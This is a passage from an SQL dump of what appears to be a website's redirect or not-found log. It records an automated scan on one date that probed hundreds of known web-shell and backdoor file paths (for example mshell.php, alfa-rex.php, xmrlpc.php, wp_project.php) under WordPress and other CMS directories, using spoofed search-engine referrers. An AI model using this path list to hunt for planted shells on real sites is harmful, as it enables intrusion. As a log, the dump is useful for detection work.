00:00:00',301),(51058,'http://3s-technologies.com.tr/en/wp-content/pm.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:01','0000-00-00 00:00:00',301),(51059,'http://3s-technologies.com.tr/en/worm0.php7',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:43:02','0000-00-00 00:00:00',301),(51060,'http://3s-technologies.com.tr/en/gawean.php7',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:43:03','0000-00-00 00:00:00',301),(51061,'http://3s-technologies.com.tr/en/wp-content/wp-head.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:43:05','0000-00-00 00:00:00',301),(51062,'http://3s-technologies.com.tr/en/wp-admin/wp-head.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:43:06','0000-00-00 00:00:00',301),(51063,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-head.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:43:10','0000-00-00 00:00:00',301),(51064,'http://3s-technologies.com.tr/en/alfadheat.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:43:12','0000-00-00 00:00:00',301),(51065,'http://3s-technologies.com.tr/en/wp-content/x/index.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:43:14','0000-00-00 00:00:00',301),(51066,'http://3s-technologies.com.tr/en/wp-content/install.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:43:15','0000-00-00 00:00:00',301),(51067,'http://3s-technologies.com.tr/en/wp-includes/ixr/themes.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:43:21','0000-00-00 00:00:00',301),(51068,'http://3s-technologies.com.tr/en/wp-includes/install.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:43:22','0000-00-00 00:00:00',301),(51069,'http://3s-technologies.com.tr/en/hehehehe.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:43:23','0000-00-00 00:00:00',301),(51070,'http://3s-technologies.com.tr/en/wp-includes/id3/wp-login.php',NULL,'https://duckduckgo.com/','',3,0,'2025-12-20 04:43:24','0000-00-00 00:00:00',301),(51071,'http://3s-technologies.com.tr/en/wp-includes/simplepie/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:25','0000-00-00 00:00:00',301),(51072,'http://3s-technologies.com.tr/en/wp-content/plugins/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:43:26','0000-00-00 00:00:00',301),(51073,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll/includes.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:43:28','0000-00-00 00:00:00',301),(51074,'http://3s-technologies.com.tr/en/wp-includes/themes.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:43:29','0000-00-00 00:00:00',301),(51075,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresss3cll/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:30','0000-00-00 00:00:00',301),(51076,'http://3s-technologies.com.tr/en/504.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:43:32','0000-00-00 00:00:00',301),(51077,'http://3s-technologies.com.tr/en/444.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:43:33','0000-00-00 00:00:00',301),(51078,'http://3s-technologies.com.tr/en/mshell.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:43:34','0000-00-00 00:00:00',301),(51079,'http://3s-technologies.com.tr/en/ioxi-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:43:35','0000-00-00 00:00:00',301),(51080,'http://3s-technologies.com.tr/en/wp-content/style-css.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:43:36','0000-00-00 00:00:00',301),(51081,'http://3s-technologies.com.tr/en/cjfuns.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:43:37','0000-00-00 00:00:00',301),(51082,'http://3s-technologies.com.tr/en/woh.php',NULL,'https://www.google.co.uk/','',6,0,'2025-12-20 04:43:39','0000-00-00 00:00:00',301),(51083,'http://3s-technologies.com.tr/en/st.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:43:40','0000-00-00 00:00:00',301),(51084,'http://3s-technologies.com.tr/en/libraries/fof/database/iterator/xmrlpc.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:43:41','0000-00-00 00:00:00',301),(51085,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/curve25519/ge/index.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:43:42','0000-00-00 00:00:00',301),(51086,'http://3s-technologies.com.tr/en/wp-includes/requests/atomlib.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:43','0000-00-00 00:00:00',301),(51087,'http://3s-technologies.com.tr/en/wp-content/plugins/yyobang/mar.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:46','0000-00-00 00:00:00',301),(51088,'http://3s-technologies.com.tr/en/million.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:46','0000-00-00 00:00:00',301),(51089,'http://3s-technologies.com.tr/en/wp-content/themes/twenty/twenty.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:49','0000-00-00 00:00:00',301),(51090,'http://3s-technologies.com.tr/en/wp-admin/images/class.api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:43:53','0000-00-00 00:00:00',301),(51091,'http://3s-technologies.com.tr/en/wp-admin/includes/class.api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:43:54','0000-00-00 00:00:00',301),(51092,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/class.api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:43:54','0000-00-00 00:00:00',301),(51093,'http://3s-technologies.com.tr/en/wp-admin/js/class.api.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:43:55','0000-00-00 00:00:00',301),(51094,'http://3s-technologies.com.tr/en/wp-admin/maint/class.api.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:43:56','0000-00-00 00:00:00',301),(51095,'http://3s-technologies.com.tr/en/wp-admin/network/class.api.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:43:57','0000-00-00 00:00:00',301),(51096,'http://3s-technologies.com.tr/en/wp-admin/user/class.api.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:43:58','0000-00-00 00:00:00',301),(51097,'http://3s-technologies.com.tr/en/wp-content/plugins/class.api.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:44:01','0000-00-00 00:00:00',301),(51098,'http://3s-technologies.com.tr/en/wp-content/languages/class.api.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:44:02','0000-00-00 00:00:00',301),(51099,'http://3s-technologies.com.tr/en/wp-content/languages/themes/class.api.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:03','0000-00-00 00:00:00',301),(51100,'http://3s-technologies.com.tr/en/wp-includes/simplepie/class.api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:44:03','0000-00-00 00:00:00',301),(51101,'http://3s-technologies.com.tr/en/wp-includes/certificates/class.api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:04','0000-00-00 00:00:00',301),(51102,'http://3s-technologies.com.tr/en/wp-includes/customize/class.api.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:44:05','0000-00-00 00:00:00',301),(51103,'http://3s-technologies.com.tr/en/wp-includes/pomo/class.api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:44:06','0000-00-00 00:00:00',301),(51104,'http://3s-technologies.com.tr/en/wp-includes/rest-api/class.api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:07','0000-00-00 00:00:00',301),(51105,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/class.api.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:08','0000-00-00 00:00:00',301),(51106,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/class.api.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:44:08','0000-00-00 00:00:00',301),(51107,'http://3s-technologies.com.tr/en/.well-known/class.api.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:10','0000-00-00 00:00:00',301),(51108,'http://3s-technologies.com.tr/en/index/class.api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:11','0000-00-00 00:00:00',301),(51109,'http://3s-technologies.com.tr/en/about/class.api.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:11','0000-00-00 00:00:00',301),(51110,'http://3s-technologies.com.tr/en/as/class.api.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:44:12','0000-00-00 00:00:00',301),(51111,'http://3s-technologies.com.tr/en/file/class.api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:44:13','0000-00-00 00:00:00',301),(51112,'http://3s-technologies.com.tr/en/chosen/class.api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:14','0000-00-00 00:00:00',301),(51113,'http://3s-technologies.com.tr/en/css/class.api.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:44:15','0000-00-00 00:00:00',301),(51114,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/class.api.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:16','0000-00-00 00:00:00',301),(51115,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/class.api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:44:17','0000-00-00 00:00:00',301),(51116,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/class.api.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:18','0000-00-00 00:00:00',301),(51117,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/class.api.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:44:18','0000-00-00 00:00:00',301),(51118,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/class.api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:44:19','0000-00-00 00:00:00',301),(51119,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/class.api.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:44:20','0000-00-00 00:00:00',301),(51120,'http://3s-technologies.com.tr/en/ajaxfilemanager/class.api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:44:21','0000-00-00 00:00:00',301),(51121,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/class.api.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:44:22','0000-00-00 00:00:00',301),(51122,'http://3s-technologies.com.tr/en/wp-content/themes/freeyanz/config.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:23','0000-00-00 00:00:00',301),(51123,'http://3s-technologies.com.tr/en/wp-content/themes/erapress/config.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:24','0000-00-00 00:00:00',301),(51124,'http://3s-technologies.com.tr/en/wp-content/plugins/doyanz/config.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:44:25','0000-00-00 00:00:00',301),(51125,'http://3s-technologies.com.tr/en/wp-content/themes/panama/json.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:44:26','0000-00-00 00:00:00',301),(51126,'http://3s-technologies.com.tr/en/fwe.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:27','0000-00-00 00:00:00',301),(51127,'http://3s-technologies.com.tr/en/jetpack.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:32','0000-00-00 00:00:00',301),(51128,'http://3s-technologies.com.tr/en/wp-content/themes/moog/config.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:44:33','0000-00-00 00:00:00',301),(51129,'http://3s-technologies.com.tr/en/wp-content/themes/blogai/issue.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:44:34','0000-00-00 00:00:00',301),(51130,'http://3s-technologies.com.tr/en/wp-content/themes/agwin/config.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:35','0000-00-00 00:00:00',301),(51131,'http://3s-technologies.com.tr/en/wp-content/themes/quext/config.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:44:36','0000-00-00 00:00:00',301),(51132,'http://3s-technologies.com.tr/en/wp-content/plugins/app-calendar/config.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:37','0000-00-00 00:00:00',301),(51133,'http://3s-technologies.com.tr/en/wp-content/plugins/wpputty/wpputty.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:43','0000-00-00 00:00:00',301),(51134,'http://3s-technologies.com.tr/en/x7.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:44:49','0000-00-00 00:00:00',301),(51135,'http://3s-technologies.com.tr/en/wp-content/themes/twentyfifteen/404.php',NULL,'https://www.yahoo.com/','',24,0,'2025-12-20 04:44:52','0000-00-00 00:00:00',301),(51136,'http://3s-technologies.com.tr/en/wp-content/themes/twentyfifteen/mini.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:44:53','0000-00-00 00:00:00',301),(51137,'http://3s-technologies.com.tr/en/wp-content/themes/wp-pridmag/up.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:44:55','0000-00-00 00:00:00',301),(51138,'http://3s-technologies.com.tr/en/wp-content/themes/tflow/up.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:44:56','0000-00-00 00:00:00',301),(51139,'http://3s-technologies.com.tr/en/wp-admin/network/cloud.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:45:00','0000-00-00 00:00:00',301),(51140,'http://3s-technologies.com.tr/en/cloud.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:45:01','0000-00-00 00:00:00',301),(51141,'http://3s-technologies.com.tr/en/cgi-bin/cloud.php',NULL,'https://www.bing.com/','',1,0,'2025-12-20 04:45:02','0000-00-00 00:00:00',301),(51142,'http://3s-technologies.com.tr/en/css/cloud.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:45:02','0000-00-00 00:00:00',301),(51143,'http://3s-technologies.com.tr/en/wp-admin/user/cloud.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:45:03','0000-00-00 00:00:00',301),(51144,'http://3s-technologies.com.tr/en/img/cloud.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:45:04','0000-00-00 00:00:00',301),(51145,'http://3s-technologies.com.tr/en/wp-admin/cloud.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:45:05','0000-00-00 00:00:00',301),(51146,'http://3s-technologies.com.tr/en/wp-content/cloud.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:45:06','0000-00-00 00:00:00',301),(51147,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/cloud.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:45:07','0000-00-00 00:00:00',301),(51148,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/xmrlpc.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:45:08','0000-00-00 00:00:00',301),(51149,'http://3s-technologies.com.tr/en/wp-admin/network/xmrlpc.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:45:09','0000-00-00 00:00:00',301),(51150,'http://3s-technologies.com.tr/en/css/xmrlpc.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:45:11','0000-00-00 00:00:00',301),(51151,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/xmrlpc.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:45:12','0000-00-00 00:00:00',301),(51152,'http://3s-technologies.com.tr/en/wp-admin/images/xmrlpc.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:45:13','0000-00-00 00:00:00',301),(51153,'http://3s-technologies.com.tr/en/images/xmrlpc.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:45:14','0000-00-00 00:00:00',301),(51154,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/xmrlpc.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:45:15','0000-00-00 00:00:00',301),(51155,'http://3s-technologies.com.tr/en/wp-admin/css/colors/xmrlpc.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:45:16','0000-00-00 00:00:00',301),(51156,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/xmrlpc.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:45:18','0000-00-00 00:00:00',301),(51157,'http://3s-technologies.com.tr/en/wp-admin/includes/xmrlpc.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:45:19','0000-00-00 00:00:00',301),(51158,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/moon.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:45:21','0000-00-00 00:00:00',301),(51159,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/moon.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:45:22','0000-00-00 00:00:00',301),(51160,'http://3s-technologies.com.tr/en/cgi-bin/moon.php',NULL,'https://www.google.fr/','',1,0,'2025-12-20 04:45:23','0000-00-00 00:00:00',301),(51161,'http://3s-technologies.com.tr/en/wp-admin/maint/moon.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:45:24','0000-00-00 00:00:00',301),(51162,'http://3s-technologies.com.tr/en/wp-content/moon.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:45:25','0000-00-00 00:00:00',301),(51163,'http://3s-technologies.com.tr/en/cache/moon.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:45:26','0000-00-00 00:00:00',301),(51164,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/0xlufix2023.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:45:28','0000-00-00 00:00:00',301),(51165,'http://3s-technologies.com.tr/en/wp-content/plugins/column/miin.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:45:30','0000-00-00 00:00:00',301),(51166,'http://3s-technologies.com.tr/en/wp-includes/certificates/moon.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:45:33','0000-00-00 00:00:00',301),(51167,'http://3s-technologies.com.tr/en/wp-content/themes/mero-megazines/ws.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:45:34','0000-00-00 00:00:00',301),(51168,'http://3s-technologies.com.tr/en/wp-content/themes/welfare-charity/www.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:45:35','0000-00-00 00:00:00',301),(51169,'http://3s-technologies.com.tr/en/wp-content/themes/finley/min.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:45:36','0000-00-00 00:00:00',301),(51170,'http://3s-technologies.com.tr/en/wp-admin/includes/themes.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:45:38','0000-00-00 00:00:00',301),(51171,'http://3s-technologies.com.tr/en/wp-admin/maint/users.php',NULL,'https://www.google.de/','',6,0,'2025-12-20 04:45:42','0000-00-00 00:00:00',301),(51172,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/users.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:45:43','0000-00-00 00:00:00',301),(51173,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/users.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:45:44','0000-00-00 00:00:00',301),(51174,'http://3s-technologies.com.tr/en/wp-admin/user/users.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:45:45','0000-00-00 00:00:00',301),(51175,'http://3s-technologies.com.tr/en/cgi-bin/users.php',NULL,'https://www.google.fr/','',1,0,'2025-12-20 04:45:46','0000-00-00 00:00:00',301),(51176,'http://3s-technologies.com.tr/en/wp-admin/images/users.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:45:47','0000-00-00 00:00:00',301),(51177,'http://3s-technologies.com.tr/en/wp_project.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:46:30','0000-00-00 00:00:00',301),(51178,'http://3s-technologies.com.tr/en/wp-admin/images/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:46:31','0000-00-00 00:00:00',301),(51179,'http://3s-technologies.com.tr/en/wp-admin/includes/wp_project.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:46:32','0000-00-00 00:00:00',301),(51180,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp_project.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:46:33','0000-00-00 00:00:00',301),(51181,'http://3s-technologies.com.tr/en/wp-admin/js/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:46:34','0000-00-00 00:00:00',301),(51182,'http://3s-technologies.com.tr/en/wp-admin/maint/wp_project.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:46:35','0000-00-00 00:00:00',301),(51183,'http://3s-technologies.com.tr/en/wp-admin/network/wp_project.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:46:36','0000-00-00 00:00:00',301),(51184,'http://3s-technologies.com.tr/en/wp-admin/user/wp_project.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:46:37','0000-00-00 00:00:00',301),(51185,'http://3s-technologies.com.tr/en/wp-content/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:46:37','0000-00-00 00:00:00',301),(51186,'http://3s-technologies.com.tr/en/wp-content/uploads/wp_project.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:46:38','0000-00-00 00:00:00',301),(51187,'http://3s-technologies.com.tr/en/wp-content/plugins/wp_project.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:46:39','0000-00-00 00:00:00',301),(51188,'http://3s-technologies.com.tr/en/wp-content/languages/wp_project.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:46:40','0000-00-00 00:00:00',301),(51189,'http://3s-technologies.com.tr/en/wp-content/languages/themes/wp_project.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:46:41','0000-00-00 00:00:00',301),(51190,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp_project.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:46:42','0000-00-00 00:00:00',301),(51191,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp_project.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:46:43','0000-00-00 00:00:00',301),(51192,'http://3s-technologies.com.tr/en/wp-includes/customize/wp_project.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:46:44','0000-00-00 00:00:00',301),(51193,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp_project.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:46:45','0000-00-00 00:00:00',301),(51194,'http://3s-technologies.com.tr/en/wp-includes/rest-api/wp_project.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:46:46','0000-00-00 00:00:00',301),(51195,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp_project.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:46:47','0000-00-00 00:00:00',301),(51196,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/wp_project.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:46:48','0000-00-00 00:00:00',301),(51197,'http://3s-technologies.com.tr/en/.well-known/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:46:49','0000-00-00 00:00:00',301),(51198,'http://3s-technologies.com.tr/en/index/wp_project.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:46:50','0000-00-00 00:00:00',301),(51199,'http://3s-technologies.com.tr/en/about/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:46:51','0000-00-00 00:00:00',301),(51200,'http://3s-technologies.com.tr/en/as/wp_project.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:46:51','0000-00-00 00:00:00',301),(51201,'http://3s-technologies.com.tr/en/file/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:46:52','0000-00-00 00:00:00',301),(51202,'http://3s-technologies.com.tr/en/chosen/wp_project.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:46:53','0000-00-00 00:00:00',301),(51203,'http://3s-technologies.com.tr/en/css/wp_project.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:46:54','0000-00-00 00:00:00',301),(51204,'http://3s-technologies.com.tr/en/doc/wp_project.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:46:55','0000-00-00 00:00:00',301),(51205,'http://3s-technologies.com.tr/en/admin/wp_project.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:46:56','0000-00-00 00:00:00',301),(51206,'http://3s-technologies.com.tr/en/mah/wp_project.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:46:58','0000-00-00 00:00:00',301),(51207,'http://3s-technologies.com.tr/en/plugins/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:46:59','0000-00-00 00:00:00',301),(51208,'http://3s-technologies.com.tr/en/client/sinchro-advisory/wp_project.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:01','0000-00-00 00:00:00',301),(51209,'http://3s-technologies.com.tr/en/wp-admin/maint/upfile.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:47:01','0000-00-00 00:00:00',301),(51210,'http://3s-technologies.com.tr/en/wp-content/themes/aahana/json.php',NULL,'https://www.google.fr/','',4,0,'2025-12-20 04:47:02','0000-00-00 00:00:00',301),(51211,'http://3s-technologies.com.tr/en/wp-content/plugins/download-plugin/wp-access.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:04','0000-00-00 00:00:00',301),(51212,'http://3s-technologies.com.tr/en/wp-content/themes/digital-download/new.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:06','0000-00-00 00:00:00',301),(51213,'http://3s-technologies.com.tr/en/js/0k.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:47:09','0000-00-00 00:00:00',301),(51214,'http://3s-technologies.com.tr/en/js/l0k.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:47:10','0000-00-00 00:00:00',301),(51215,'http://3s-technologies.com.tr/en/wp-content/languages/themes/index.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:47:13','0000-00-00 00:00:00',301),(51216,'http://3s-technologies.com.tr/en/wp-content/plugins/content-management/content.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:15','0000-00-00 00:00:00',301),(51217,'http://3s-technologies.com.tr/en/wp-content/themes/hideo/network.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:47:16','0000-00-00 00:00:00',301),(51218,'http://3s-technologies.com.tr/en/typo3conf/ext/hi_surveystats/res/php-ofc-library/ofc_upload_image.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:47:20','0000-00-00 00:00:00',301),(51219,'http://3s-technologies.com.tr/en/wp-2020.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:22','0000-00-00 00:00:00',301),(51220,'http://3s-technologies.com.tr/en/wp-2021.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:47:23','0000-00-00 00:00:00',301),(51221,'http://3s-technologies.com.tr/en/wp-2022.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:24','0000-00-00 00:00:00',301),(51222,'http://3s-technologies.com.tr/en/wp-xml.php',NULL,'https://duckduckgo.com/','',26,0,'2025-12-20 04:47:25','0000-00-00 00:00:00',301),(51223,'http://3s-technologies.com.tr/en/wp-includes/content.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:47:27','0000-00-00 00:00:00',301),(51224,'http://3s-technologies.com.tr/en/wp-settings.php',NULL,'https://www.yahoo.com/','',4,0,'2025-12-20 04:47:31','0000-00-00 00:00:00',301),(51225,'http://3s-technologies.com.tr/en/wp-2023.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:31','0000-00-00 00:00:00',301),(51226,'http://3s-technologies.com.tr/en/wp-log1n.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:47:32','0000-00-00 00:00:00',301),(51227,'http://3s-technologies.com.tr/en/wp-2024.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:47:33','0000-00-00 00:00:00',301),(51228,'http://3s-technologies.com.tr/en/moduless.ph',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:47:35','0000-00-00 00:00:00',301),(51229,'http://3s-technologies.com.tr/en/g3.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:47:38','0000-00-00 00:00:00',301),(51230,'http://3s-technologies.com.tr/en/dbtoolkit_import.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:47:39','0000-00-00 00:00:00',301),(51231,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/dbtoolkit_import.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:41','0000-00-00 00:00:00',301),(51232,'http://3s-technologies.com.tr/en/wp-admin/network/dbtoolkit_import.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:47:42','0000-00-00 00:00:00',301),(51233,'http://3s-technologies.com.tr/en/cgi-bin/dbtoolkit_import.php',NULL,'https://duckduckgo.com/','',1,0,'2025-12-20 04:47:42','0000-00-00 